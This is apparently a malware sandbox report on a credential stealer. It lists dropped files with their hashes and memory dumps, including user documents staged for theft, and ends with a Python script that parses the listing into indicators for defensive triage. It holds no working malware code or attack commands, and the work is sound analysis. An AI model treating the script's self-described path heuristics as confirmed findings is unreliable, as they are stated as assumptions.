| MD5 | f59da07dbbdd126cfbd617191e08d949 |
| SHA1 | f9a9f0e453cf4c2cde6511817eebe262e5f7df7e |
| SHA256 | 0a39726fe4e2da50c419b8ecf159c5f434854abd20103a89abe2aa378d8e5240 |
| SHA512 | c5e5941dd6e6bece7c0fb588254b82fe16563cfeab0fb27764466b55c7ac0a70b6dd3bca377807a3a4509ac27cc7e34ad16402d9992b3da02d726f02ed98b75f |
memory/3384-43-0x0000000074DA0000-0x0000000074DAD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI16282\_lzma.pyd
| MD5 | 9f4917705676062bebc879968a0d24d1 |
| SHA1 | 751d9e6dae9e43eba719b36875ed89801cc1f07e |
| SHA256 | 11fc0bbe22dcdba2f4952eb38ab31447833d52c624d97253ae08a77ff65415b2 |
| SHA512 | b89df73d3980a56b2a88a6ba001e894be6f70bcbbc1d498f9cfd6981bae934d3a0193ddde75252556f1fe3ce942db4b5dcfea1982ebbbf5b9ec29a08b3e7088a |
C:\Users\Admin\AppData\Local\Temp\_MEI16282\_hashlib.pyd
| MD5 | afd1f13811e21a9a303d633cc3081d18 |
| SHA1 | d9736b444a27b0d3a13bc95d579445f9e72af99a |
| SHA256 | 052edf9eb0742063050ddb59810c34c7d640748ed760408299b6821e095922c8 |
| SHA512 | 4a76a4c52f2983ea7f141343d08e32b11fc499c87282e44bd77ef50259f544e8212db235ef9cd541337fdc8fb872f34f58be3a343e7c70b29a822e3f2363e934 |
C:\Users\Admin\AppData\Local\Temp\_MEI16282\_decimal.pyd
| MD5 | e70eb2dff120e954a305c37d1ff6c19b |
| SHA1 | 246618204685a5e1d30f4a3d18a298441c65df8f |
| SHA256 | ecbf5f140349137a46609bfb625572907deb211005c4cc0eca6875770af47f25 |
| SHA512 | 15bbdad7358da39e2348986dd96f19c88d8bad83c3de0cf14b3d22205ba9c4cf0beb09d7dbaebe65af5b532b343c1336596e3754606a409c3e6f56ca0d29d3c4 |
C:\Users\Admin\AppData\Local\Temp\_MEI16282\_bz2.pyd
| MD5 | 04006baa3fdda07ad06790c814130025 |
| SHA1 | 7ae71d19d31a38fa4cd06f38b1780176e9837747 |
| SHA256 | 65345e9fb47a8e07135a8df71690966756fb3a16601ea76e1c37cb5a85687959 |
| SHA512 | 0c1b27e18455bd966df67b719507afa9b83b0a134b985361efa13dd6001c37dc48a8c119847215235c0f8e47c6c3bc2fb2be8b5854f51368dc28f4f2df36830a |
C:\Users\Admin\AppData\Local\Temp\_MEI16282\unicodedata.pyd
| MD5 | c7e0867cd0fa2b064c04ec11ebbdfb87 |
| SHA1 | d49d08b256dceff227eaa0ca1d8bb9ad1f703af2 |
| SHA256 | 1a659226b8d69eeac0a736a8a071dc11bdcf704223b6805f97d6ba5b25af5393 |
| SHA512 | 5379f40599a32b4638ebb039c4b800993e6bdd3d53214c9e0e7ae9aa9d8e113b842c6e15aada8f9cb5b0187f5505525eddfe4af345064a8ca0ecc51226e45b41 |
C:\Users\Admin\AppData\Local\Temp\_MEI16282\sqlite3.dll
| MD5 | 8bd12c9b21db13de4c3eaaf7bd757ede |
| SHA1 | 27e9efc0fc2266cb20c240924a4531a05f5d4483 |
| SHA256 | 7b66dd1353c177f61f756282c593f418806272ecc133d56c683fb8f3b9e4b8bb |
| SHA512 | 870273349ae1d59fd4bfee3efa98b7952134a96b9763eebd5175d0c07bc67b5ce827cde2cb734dee6781aeac5fd74d807c40c9d7725d381799d091c6c3e89d55 |
C:\Users\Admin\AppData\Local\Temp\_MEI16282\select.pyd
| MD5 | 54b5a5be15558a18a37d365166fcb204 |
| SHA1 | 7eab97277e80d1866e281315476b16b0e07c7fa6 |
| SHA256 | 5659c008b91d7630a8b9a7fba444a95fc277a9d9b31f288e9f460aca5bcfb47d |
| SHA512 | e0a506d48e6aca6eb71250ff925aa4866955a472b20b9dae58689ad3dbc6727a628bd5b9ac4912d56de60f6d3c828576397b9d597512d345150ab06a75ca3d12 |
C:\Users\Admin\AppData\Local\Temp\_MEI16282\rarreg.key
| MD5 | 4531984cad7dacf24c086830068c4abe |
| SHA1 | fa7c8c46677af01a83cf652ef30ba39b2aae14c3 |
| SHA256 | 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211 |
| SHA512 | 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122 |
C:\Users\Admin\AppData\Local\Temp\_MEI16282\rar.exe
| MD5 | 9c223575ae5b9544bc3d69ac6364f75e |
| SHA1 | 8a1cb5ee02c742e937febc57609ac312247ba386 |
| SHA256 | 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213 |
| SHA512 | 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09 |
C:\Users\Admin\AppData\Local\Temp\_MEI16282\libssl-1_1.dll
| MD5 | d62489e28394dbb4745ee72bd777ee4d |
| SHA1 | 1e636225c659487cfd3cf5ee818269ab069f6eba |
| SHA256 | c54c1358a713b15684e495f8794353d3a14cf1ccf65c62a0f232af99805a4d6d |
| SHA512 | 55003db4cfaf06547224a1004dbb6e5f6d27dbfcace9a1370d5f5d424e06089fd937b1937ba2aa5a0e54f0e56195541f92c020a662329331b088d9b909f8f345 |
C:\Users\Admin\AppData\Local\Temp\_MEI16282\libcrypto-1_1.dll
| MD5 | 3040b7f9d4f0aa7370f4a236abd6f7c7 |
| SHA1 | 2b3c99fdcda79d5f65dc3f9dfaaf77f3d5cd50b1 |
| SHA256 | b508fb7966c8fed89612bb053bd74d64fddc3b71e36cb4dfa96234970ece1603 |
| SHA512 | 9a1f2f2e394e4a30e31bca620a7a107a6a065f8d69f00408f8f41140537bd5b2a3d863620f3850d2dd39ba8d8d003a518f9707a608ab0fbd4d0988afab41b446 |
C:\Users\Admin\AppData\Local\Temp\_MEI16282\blank.aes
| MD5 | ae1e425f37d900d4c331a589f437757d |
| SHA1 | a2572722b0e4313fea87268fde5a12076b4d3d7b |
| SHA256 | b2cafa4dee69ee95be3a3b4416d3797f60163048d63be16365ef26f04d41bae2 |
| SHA512 | 2010152e73829a11bd018ce48761164d62e376e3d81f847e1a61595e5bbab2bbce38ac5ad8cea8929e7eda943891cbb1cf977784cd560ac11e01719b855c2a17 |
C:\Users\Admin\AppData\Local\Temp\_MEI16282\libffi-8.dll
| MD5 | 465d9a82d922d41a5a181365ce2ee2d7 |
| SHA1 | d6b5bb97a03a117a0b60957ba9ff1464c4139708 |
| SHA256 | ef8117de97cc4a3197d1e5db657c34fba7016af756f6f3f6c18bda1670241c4b |
| SHA512 | c3a16d5db986cc8aaea1a4380517433e51a9377dc348a2ca6c08f58b12f85a729e6750370bd35422baa99b6e2bb24240a7dd28b7cfd038a04054e4d39a889fed |
memory/3384-54-0x0000000074D70000-0x0000000074D97000-memory.dmp
memory/3384-57-0x0000000074D50000-0x0000000074D68000-memory.dmp
memory/3384-58-0x0000000074D30000-0x0000000074D4B000-memory.dmp
memory/3384-60-0x0000000074BF0000-0x0000000074D26000-memory.dmp
memory/3384-62-0x0000000074BD0000-0x0000000074BE6000-memory.dmp
memory/3384-64-0x0000000074B80000-0x0000000074B8C000-memory.dmp
memory/3384-66-0x0000000074B50000-0x0000000074B78000-memory.dmp
memory/3384-70-0x0000000074E00000-0x000000007530A000-memory.dmp
memory/3384-72-0x00000000039E0000-0x0000000003C3A000-memory.dmp
memory/3384-74-0x0000000074DB0000-0x0000000074DCF000-memory.dmp
memory/3384-73-0x0000000074850000-0x0000000074AAA000-memory.dmp
memory/3384-71-0x0000000074AB0000-0x0000000074B44000-memory.dmp
memory/3384-79-0x00000000747D0000-0x00000000747DC000-memory.dmp
memory/3384-81-0x00000000746A0000-0x00000000747B8000-memory.dmp
memory/3384-78-0x0000000074D70000-0x0000000074D97000-memory.dmp
memory/3384-76-0x00000000747E0000-0x00000000747F0000-memory.dmp
memory/4392-82-0x0000000002430000-0x0000000002466000-memory.dmp
memory/4076-83-0x0000000004F50000-0x0000000005578000-memory.dmp
memory/4076-84-0x00000000055C0000-0x00000000055E2000-memory.dmp
memory/4076-86-0x00000000057D0000-0x0000000005836000-memory.dmp
memory/4076-85-0x0000000005760000-0x00000000057C6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y3fphz4w.mtr.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4076-101-0x0000000005860000-0x0000000005BB4000-memory.dmp
memory/4076-107-0x00000000063C0000-0x000000000640C000-memory.dmp
memory/4076-106-0x0000000005E60000-0x0000000005E7E000-memory.dmp
memory/4392-108-0x0000000006EC0000-0x0000000006EF2000-memory.dmp
memory/4076-120-0x0000000073350000-0x000000007339C000-memory.dmp
memory/4392-119-0x0000000006F00000-0x0000000006F1E000-memory.dmp
memory/4392-109-0x0000000073350000-0x000000007339C000-memory.dmp
memory/4392-130-0x0000000006F30000-0x0000000006FD3000-memory.dmp
memory/4076-132-0x0000000007180000-0x000000000719A000-memory.dmp
memory/4076-131-0x00000000077D0000-0x0000000007E4A000-memory.dmp
memory/4076-133-0x00000000071F0000-0x00000000071FA000-memory.dmp
memory/4076-134-0x0000000007400000-0x0000000007496000-memory.dmp
memory/4392-135-0x0000000007270000-0x0000000007281000-memory.dmp
memory/4076-136-0x00000000073B0000-0x00000000073BE000-memory.dmp
memory/4076-137-0x00000000073C0000-0x00000000073D4000-memory.dmp
memory/4076-138-0x00000000074C0000-0x00000000074DA000-memory.dmp
memory/4076-139-0x00000000074A0000-0x00000000074A8000-memory.dmp
memory/3384-186-0x0000000074D30000-0x0000000074D4B000-memory.dmp
memory/4364-247-0x0000000005FD0000-0x0000000005FF2000-memory.dmp
memory/4364-248-0x00000000071C0000-0x0000000007764000-memory.dmp
memory/4364-249-0x0000000006C10000-0x0000000006CA2000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\gbnof1nn\gbnof1nn.cmdline
| MD5 | d7faa2a5ab639762ac6cd338fe080c61 |
| SHA1 | 910774d0fb03037da5be7ba91d640e740f4ebcae |
| SHA256 | 58b9e94c97e70a371283a89a39c98c294df4dd3d4a07b35157831d652e3aa7b0 |
| SHA512 | 5cccfb0bcb1a0ee1829742f445e4726f1654538781d595e2b6c9efa53c3dad2965cb88194564c7543ba0c6a8bd9cbd13487552174d825738cc5cd21bb05ed4fc |
\??\c:\Users\Admin\AppData\Local\Temp\gbnof1nn\gbnof1nn.0.cs
| MD5 | c76055a0388b713a1eabe16130684dc3 |
| SHA1 | ee11e84cf41d8a43340f7102e17660072906c402 |
| SHA256 | 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7 |
| SHA512 | 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2 |
\??\c:\Users\Admin\AppData\Local\Temp\gbnof1nn\CSC6D949D6C16CB4DFAA052AA6D78B9B023.TMP
| MD5 | ec4d67e1db25eafc77fd4b10ae0bccbe |
| SHA1 | 8b816db9212db0900250ff7f912465e4fe36b6d4 |
| SHA256 | 9d3325e8a7dbbf52ed2f5a76281e40b9c7f328fb2ad3aeea0de05302b2dd9a9b |
| SHA512 | cae6222880dc4700ef716b0b0632fcc531953f8e069c621b6e2fb52a04fba82eec820f080def4863b71c1af82a4e4c0f33f91effb9fe7df8281ba5c99c5b3e9c |
C:\Users\Admin\AppData\Local\Temp\RES5A26.tmp
| MD5 | 177a1de854c43ec3f6c08f626f3f645a |
| SHA1 | 1304b178b7a930f174a733fa278f87ee2943ccdd |
| SHA256 | e7a76d9a2dffb814e44fe5d078dad12a0f2c6a8e023f171570fb0e9c2cb5c5b9 |
| SHA512 | 314f00cf7ebbcc188f1344ffd62cc36967c981298e08624c92ad13ced9633eaddd686b2e077f9e211f6e356a2acd5961329ce020b020c3c750c9fa79c6cf6943 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | bdf103ecadf2098f1a4af55b65cd072a |
| SHA1 | cd0c398d2c35946a65653d8f5be64681dff0ac96 |
| SHA256 | 3026e82835ee98106040a6da7252950f518e6fb3449bfd2293d7f9abbb19918a |
| SHA512 | ef8ec609de440269cb7597041b3df164a7d83141b038003f26b782de53c0a0de4b985576c862d7a637a6b3d8201267c45c22d726b1d76fd66793a211b81463c6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 38a8bf5cb25f2dca7052faa2f056d162 |
| SHA1 | 50bcdff62f03f12157042fb39c81b0773a515cee |
| SHA256 | c674f2290d8048689c20f8f91618e4519f6fac990724867ee1ca44555e637d39 |
| SHA512 | c491d3eab1acf2630e0e3e070bb359b50051a1642ab96279e29bd137ccef19aafd05802b8c87b400c2e5eaf10f82f1ebb5c8ae13391dba930a42ab6b86045146 |
memory/2272-268-0x0000000007230000-0x0000000007238000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\gbnof1nn\gbnof1nn.dll
| MD5 | aeadad4c4f9e8f95a74d455eddfff266 |
| SHA1 | ccd9652112e280a7a672240fadac4135c3df8749 |
| SHA256 | 71899a3bff22084bd6194c0a36a42fe06bd27f5ea2620d742e8696240a573218 |
| SHA512 | ec7b67ace26278c88e67be02c92714d3b24ed0959a67fbe5d6a11d61044af94367af64842da9ff92fb829e4985c759f0c66457f256bdfe8a1d31c606537f486d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 90b03af060be5a7baf13e0f12de6999e |
| SHA1 | 8769165f5b76c28524322da5a573a1e36a524b7d |
| SHA256 | dc7db1d1b2c1bfde6f21e986151395fea22fe2dced7efd29a4d4180b0539aa69 |
| SHA512 | 757b339cc5c9719d744d6e730839d845ad32cf40d4bebe472b496635deff7c00168224c3ec794663a187e02f3b13087c1a3d44bbe6d0f76502cf687486a2cf16 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1006088276c534d3c860cb06cc27c19e |
| SHA1 | 5a9fd1e3d9957b026aaa13f313cc899160e7fc19 |
| SHA256 | 64f187a56698b959802dcca5c5a9c097cdd2e6897364e0148e5cda14023dafea |
| SHA512 | 318d37d9ef174aff0041c6f3cc14c6bcc27f62ba55333d2b7d7f50fbafa927e3a35c83359d4158dfa314467e0938be1486ef4b56221b7b57c32f73727e16bd1b |
memory/4864-292-0x0000000005E20000-0x0000000005E6C000-memory.dmp
memory/3384-297-0x0000000074BF0000-0x0000000074D26000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\AddRedo.docx
| MD5 | 4d64ab44beccabe19b2ffd4ad36cce86 |
| SHA1 | c3e1acafa63753e88317c154b54f32faf65b08cb |
| SHA256 | 1686d5a90b78b04f567fe1d750ff2f76da7589a38e54170bb4a4524b1507f89e |
| SHA512 | dec4be574d4a24de66eff4b3dc40aa7cc59a89d096459d353ce37b4b47dfe4dcd058bed9b52cac72458c981caedaf186ef1387bc0cffabb65778c8b059ee114c |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\AssertConvertTo.doc
| MD5 | ff40a94640e4214deee16e77f0712ecd |
| SHA1 | 7d265d2d220d73651cd3e1e07d7ea3e02dda79a5 |
| SHA256 | 36a247cde0b80f12425bf09acc5b6cfa14bb2a621ecb83c1da2b2977892a8b79 |
| SHA512 | 89dfb6b80a4fc14b8a064c6244459c38953d3e84c30c96bc5d8e28a3d7a3a33b04b0464c35f887da5d4346aeaedf594f9ad339be084f0c87453040badbfc8025 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Are.docx
| MD5 | a33e5b189842c5867f46566bdbf7a095 |
| SHA1 | e1c06359f6a76da90d19e8fd95e79c832edb3196 |
| SHA256 | 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454 |
| SHA512 | f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\EnableEnter.pdf
| MD5 | dd8dd7a0402ecd67a83d29fc90131927 |
| SHA1 | 8aedc3e6204c5f862be08195f558ced52be16190 |
| SHA256 | 0c136efbeb5ecfd3786991f6acbf112be4e219d4dece0977d73269dfbe1c7c6f |
| SHA512 | 0109c2a759fc10813ea1641ed259595ec58309bf8d1029bb3c54b37cb8ddd3209d4d95dd9e3ccd152330858f9162e8db585a83b0408b2f547bd38256123264d7 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Files.docx
| MD5 | 4a8fbd593a733fc669169d614021185b |
| SHA1 | 166e66575715d4c52bcb471c09bdbc5a9bb2f615 |
| SHA256 | 714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42 |
| SHA512 | 6b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\LockClear.pdf
| MD5 | 33d389aca97e0c2ab7ec7ab74634a820 |
| SHA1 | 56e6d3d3098b1903fa02ed1f499d8d259b64433b |
| SHA256 | e9f00efc50a5cb18266e8b6856c45ae913ba64d71344adb435f73f17b37a7f82 |
| SHA512 | 4c733a23bed0b9c760c7fece4e401c9e88441a1b68642e76df79d94bc201dda52fe595c424cfb2d395a6a22c98867f42db955d693ddb93709e0ba31e8c7c0c69 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Opened.docx
| MD5 | bfbc1a403197ac8cfc95638c2da2cf0e |
| SHA1 | 634658f4dd9747e87fa540f5ba47e218acfc8af2 |
| SHA256 | 272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6 |
| SHA512 | b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Recently.docx
| MD5 | 3b068f508d40eb8258ff0b0592ca1f9c |
| SHA1 | 59ac025c3256e9c6c86165082974fe791ff9833a |
| SHA256 | 07db44a8d6c3a512b15f1cb7262a2d7e4b63ced2130bc9228515431699191cc7 |
| SHA512 | e29624bc8fecb0e2a9d917642375bd97b42502e5f23812195a61a4920cae5b6ed540e74dfcf8432dcceb7de906ad0501cdd68056f9b0ec86a6bb0c1e336bfe32 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\RepairBackup.wps
| MD5 | 2159cedd88325a059199dcf12f1b4900 |
| SHA1 | 17266bb2ce23cdd130ad25efb55e33f94bf18b82 |
| SHA256 | af3d21f68a31831c3c220dd495a353da1fbd66d833f86b4d3802aabe3c8f8e55 |
| SHA512 | a1014bd617b647d1b8c5643a4cba69b7d93eff1a2b332085c31c94dbb94d05771c2afc22c8b7c6d5d41ea5e29a0fb1fb3316eb912f4e65d6b1130841da80c54f |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\ResolveShow.doc
| MD5 | 67d29096c342f82ec8131d5f3cca9757 |
| SHA1 | c97675b30e55365c438789e83d69e2ce35761202 |
| SHA256 | 21466a5666189334c55f03c9e554433dd4c9763764f3a509ce4904235991bc96 |
| SHA512 | 7b9a68ac44fb342a41b3c38f771e5e4e2bbd0d84f1c3bb7668a187acb6ce1cdf9bfb4e78de5af58ea6188186bbf982288f5cade55dba25f41d40158857822181 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\These.docx
| MD5 | 87cbab2a743fb7e0625cc332c9aac537 |
| SHA1 | 50f858caa7f4ac3a93cf141a5d15b4edeb447ee7 |
| SHA256 | 57e3b0d22fa619da90237d8bcf8f922b142c9f6abf47efc5a1f5b208c4d3f023 |
| SHA512 | 6b678f0dd0030806effe6825fd52a6a30b951e0c3dcf91dfd7a713d387aa8b39ec24368e9623c463360acba5e929e268f75ce996526c5d4485894b8ac6b2e0fa |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Downloads\ApproveInitialize.png
| MD5 | 9c5ca9bd53ed968ab7b3c1e18dfdeab6 |
| SHA1 | 81423d1d183637e619f619b21bedda1b71dd1665 |
| SHA256 | c43e03e8a4fa54d29fa752f199093ec2249346f8cf12e52eda0b9f6a30b2efa2 |
| SHA512 | 258b256a1660d2139853f87f1ce8f784ba0de7737c55757d0881c80bf3c715f5298864e394d9b2bef4f60398b56ae66d23f66bd6c31ec8ecc0a8a0a306a362ab |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Downloads\ConfirmUndo.png
| MD5 | 9b7b05f8215d5009ad8bbcb4b4bdaa17 |
| SHA1 | 339dc4994755517fe514fd4647f623246c144b8e |
| SHA256 | 228267da6a2a8c24304cd7a090a1ef53115c20b40a626b08b956235fa2f2af48 |
| SHA512 | d79c35fb5a1b1428f76e08ac62cfac2dc7e82bcdd1749fdc016602d5483d25172ff7afd0439115e1f3d5f8391f5f11b6fdb4ddff8885e2bccedab32629842396 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Downloads\InvokeConvert.xls
| MD5 | 9304af50855fd2935b2e864c55dac5d3 |
| SHA1 | a9bea86acad3157ceb4ac84860c8cd8c607a97ed |
| SHA256 | 76d442e473e29d317ccaf99d732642d246d33955bea3f6e98cac65013df58832 |
| SHA512 | 94f0b7687db1a54c03445bd59b19033dfc57314318a7611fbb3bff41a9a2897c8ccc339f18e6917338bf6bfde146db5e6134a278566c5e268ec788fdd2711030 |
memory/4064-323-0x00000000063F0000-0x0000000006744000-memory.dmp
memory/4064-324-0x00000000069F0000-0x0000000006A3C000-memory.dmp
memory/3384-341-0x0000000074BD0000-0x0000000074BE6000-memory.dmp
memory/3384-340-0x00000000746A0000-0x00000000747B8000-memory.dmp
memory/3384-337-0x0000000074850000-0x0000000074AAA000-memory.dmp
memory/3384-336-0x0000000074AB0000-0x0000000074B44000-memory.dmp
memory/3384-335-0x0000000074B50000-0x0000000074B78000-memory.dmp
memory/3384-332-0x0000000074BF0000-0x0000000074D26000-memory.dmp
memory/3384-327-0x0000000074DB0000-0x0000000074DCF000-memory.dmp
memory/3384-326-0x0000000074E00000-0x000000007530A000-memory.dmp
memory/4800-342-0x00000000061A0000-0x00000000064F4000-memory.dmp
memory/4800-352-0x0000000006C10000-0x0000000006C5C000-memory.dmp
memory/3384-354-0x00000000039E0000-0x0000000003C3A000-memory.dmp
memory/3384-371-0x0000000074DB0000-0x0000000074DCF000-memory.dmp
memory/3384-380-0x0000000074AB0000-0x0000000074B44000-memory.dmp
memory/3384-384-0x00000000746A0000-0x00000000747B8000-memory.dmp
memory/3384-383-0x00000000747D0000-0x00000000747DC000-memory.dmp
memory/3384-382-0x00000000747E0000-0x00000000747F0000-memory.dmp
memory/3384-381-0x0000000074E00000-0x000000007530A000-memory.dmp
memory/3384-379-0x0000000074B50000-0x0000000074B78000-memory.dmp
memory/3384-378-0x0000000074B80000-0x0000000074B8C000-memory.dmp
memory/3384-377-0x0000000074BD0000-0x0000000074BE6000-memory.dmp
memory/3384-376-0x0000000074BF0000-0x0000000074D26000-memory.dmp
memory/3384-375-0x0000000074D50000-0x0000000074D68000-memory.dmp
memory/3384-374-0x0000000074D30000-0x0000000074D4B000-memory.dmp
memory/3384-373-0x0000000074D70000-0x0000000074D97000-memory.dmp
memory/3384-372-0x0000000074DA0000-0x0000000074DAD000-memory.dmp
memory/3384-370-0x0000000074850000-0x0000000074AAA000-memory.dmp
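The lines above are the raw dropped-file and memory-dump inventory from the detonation: a file path followed by its MD5/SHA1/SHA256/SHA512 rows, interleaved with `memory/<pid>-<seq>-<start>-<end>-memory.dmp` entries. As an added example (not part of the report and not code from the Blank Grabber project), the following Python parses that format into structured records, checks that every digest has the expected length, sums the dumped address ranges per PID, and tags paths with heuristics that are our own assumptions rather than report findings: `_MEI<digits>` directories as PyInstaller's runtime extraction folder, `__PSScriptPolicyTest_*.ps1` as the probe file powershell.exe writes when it checks script policy at startup, `.cmdline`/`.0.cs`/`CSC*.TMP`/`RES*.tmp` as csc.exe compile artifacts of the kind `Add-Type` leaves behind, and files under `Temp\ \Common Files\` as user documents staged for collection. The embedded sample input is a handful of entries copied from the listing; everything else in the block is constructed.

```python
"""Turn a sandbox report's dropped-file / memory-dump listing into structured
IOCs.  Added example; not code from the report or from the malware.  The
path tags in classify() are our own heuristics, not report findings."""
import re
from collections import defaultdict

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
HASH_ROW = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]+)\s*\|$")
MEM_ROW = re.compile(
    r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")

# Constructed sample: a few entries copied verbatim from the report listing.
SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\_MEI16282\blank.aes
| MD5 | ae1e425f37d900d4c331a589f437757d |
| SHA1 | a2572722b0e4313fea87268fde5a12076b4d3d7b |
| SHA256 | b2cafa4dee69ee95be3a3b4416d3797f60163048d63be16365ef26f04d41bae2 |
| SHA512 | 2010152e73829a11bd018ce48761164d62e376e3d81f847e1a61595e5bbab2bbce38ac5ad8cea8929e7eda943891cbb1cf977784cd560ac11e01719b855c2a17 |
memory/3384-54-0x0000000074D70000-0x0000000074D97000-memory.dmp
memory/4076-83-0x0000000004F50000-0x0000000005578000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y3fphz4w.mtr.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
\??\c:\Users\Admin\AppData\Local\Temp\gbnof1nn\gbnof1nn.0.cs
| MD5 | c76055a0388b713a1eabe16130684dc3 |
| SHA1 | ee11e84cf41d8a43340f7102e17660072906c402 |
| SHA256 | 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7 |
| SHA512 | 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2 |
"""


def parse_listing(text):
    """Return (files, regions): files as [{path, hashes}], regions as
    [{pid, seq, start, end}].  Any line that is neither a hash row nor a
    memory row opens a new file entry, so feed it only the listing itself."""
    files, regions = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HASH_ROW.match(line)
        if m:
            if not files:
                raise ValueError(f"hash row before any file path: {line}")
            files[-1]["hashes"][m.group(1)] = m.group(2).lower()
            continue
        m = MEM_ROW.match(line)
        if m:
            regions.append({"pid": int(m.group(1)), "seq": int(m.group(2)),
                            "start": int(m.group(3), 16), "end": int(m.group(4), 16)})
            continue
        files.append({"path": line, "hashes": {}})
    return files, regions


def validate_hashes(files):
    """Flag entries whose digests are missing or have the wrong hex length
    (a truncated or mis-copied hash is useless for blocklisting)."""
    problems = []
    for f in files:
        for algo, n in HASH_LEN.items():
            h = f["hashes"].get(algo)
            if h is None:
                problems.append(f"{f['path']}: missing {algo}")
            elif len(h) != n:
                problems.append(f"{f['path']}: {algo} has {len(h)} hex digits, expected {n}")
    return problems


def classify(path):
    """Heuristic tag derived from the path alone (assumptions, see lead-in)."""
    p = path.lower()
    name = p.rsplit("\\", 1)[-1]
    if re.search(r"\\_mei\d+\\", p):
        return "pyinstaller-runtime"        # _MEI<digits>: PyInstaller extraction dir
    if name.startswith("__psscriptpolicytest_"):
        return "powershell-policy-probe"    # written by powershell.exe at startup
    if name.endswith((".cmdline", ".0.cs")) or re.match(r"(csc|res)[0-9a-f]+\.tmp$", name):
        return "csc-compile-artifact"       # csc.exe run, typical of Add-Type
    if "\\ \\common files\\" in p:
        return "staged-user-document"       # mirrors Desktop/Documents/Downloads
    return "other"


def regions_by_pid(regions):
    """Total dumped bytes per PID, counting a repeated address range once
    (the same range is often dumped at several sequence numbers)."""
    seen = defaultdict(set)
    for r in regions:
        seen[r["pid"]].add((r["start"], r["end"]))
    return {pid: sum(end - start for start, end in ranges) for pid, ranges in seen.items()}


def summarize(text):
    """One-shot triage view: hash problems, SHA256s grouped by tag, bytes per PID."""
    files, regions = parse_listing(text)
    tags = defaultdict(list)
    for f in files:
        tags[classify(f["path"])].append(f["hashes"].get("SHA256"))
    return {"problems": validate_hashes(files), "tags": dict(tags),
            "bytes_by_pid": regions_by_pid(regions)}


if __name__ == "__main__":
    import json
    print(json.dumps(summarize(SAMPLE), indent=2))
```

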